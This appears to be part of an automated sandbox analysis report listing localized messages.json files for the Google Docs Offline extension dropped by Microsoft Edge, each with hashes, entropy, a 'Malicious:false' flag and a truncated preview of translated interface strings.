                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                      MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                      SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                      SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                      SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1320
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                      MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                      SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                      SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                      SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):884
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                      MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                      SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                      SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                      SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):980
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                      MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                      SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                      SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                      SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1941
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                      MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                      SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                      SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                      SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1969
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                      MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                      SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                      SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                      SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1674
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                      MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                      SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                      SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                      SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1063
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                      MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                      SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                      SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                      SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1333
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                      MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                      SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                      SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                      SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1263
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                      MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                      SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                      SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                      SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1074
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                      MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                      SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                      SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                      SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):879
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                      MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                      SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                      SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                      SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1205
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                      MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                      SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                      SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                      SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):843
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                      MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                      SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                      SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                      SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir7264_2078989178\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):912
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                      MD5:71F916A64F98B6D1B5D1F62D297FDEC1
